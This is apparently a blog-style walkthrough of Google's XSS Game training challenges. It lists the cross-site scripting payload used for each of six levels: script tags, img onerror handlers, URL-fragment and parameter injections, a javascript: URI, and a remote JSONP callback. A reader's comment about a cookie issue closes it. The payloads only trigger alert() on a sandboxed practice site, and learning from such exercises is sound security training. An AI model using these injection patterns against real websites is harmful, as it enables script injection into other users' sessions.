- Google XSS Challenges at https://xss-game.appspot.com
- Help : https://www.google.com/about/appsecurity/learning/xss/index.html
The output will be directly displayed without any escaping.
A simple query with <script>alert("XSS")</script>
will do the job.
script blocks are not allowed.
Post content : <img src='aaaaaaa' onerror=alert("XSS")>
Make sure that aaaaaaa
is not a valid image.
The only thing we can do is to use the URL for the attack vector.
A few tests later, we understand that the section after the '#' is placed
in a img block. Same JS trick as Level 2.
URL : https://xss-game.appspot.com/level3/frame#1' onerror='alert("XSS")
Other solutions:
https://xss-game.appspot.com/level3/frame#1'><script>alert("XSS")</script>
https://xss-game.appspot.com/level3/frame#1.jpg' onload=alert("XSS")>
The input will be displayed but will be escaped.
Otherwise, the input is also used in the img section which displays the loading animation
Query : 1";alert("XSS
URL : https://xss-game.appspot.com/level4/frame?timer=1';alert('XSS
The next
field in the URL represents the name of the function call on submit.
Just put javascript:alert("XSS")
into next
value.
URL : https://xss-game.appspot.com/level5/frame/signup?next=javascript%3Aalert%28%27XSS%27%29
(forth hint really useful)
Here we can't insert code but we can ask to load a library from Google JSAPI for instance.
URl : https://xss-game.appspot.com/level6/frame#//google.com/jsapi?callback=alert
If we try with a complete URL such as htt://google.com/jsapi?callback=alert, strange things appended. I'm sure there might be a way without any API but I didn't find it yet.
Hi, when i try to access level 2 i see the following message
Based on your browser cookies it seems like you haven't passed the previous level of the game. Please go back to the previous level and complete the challenge.
anybody has the same problem?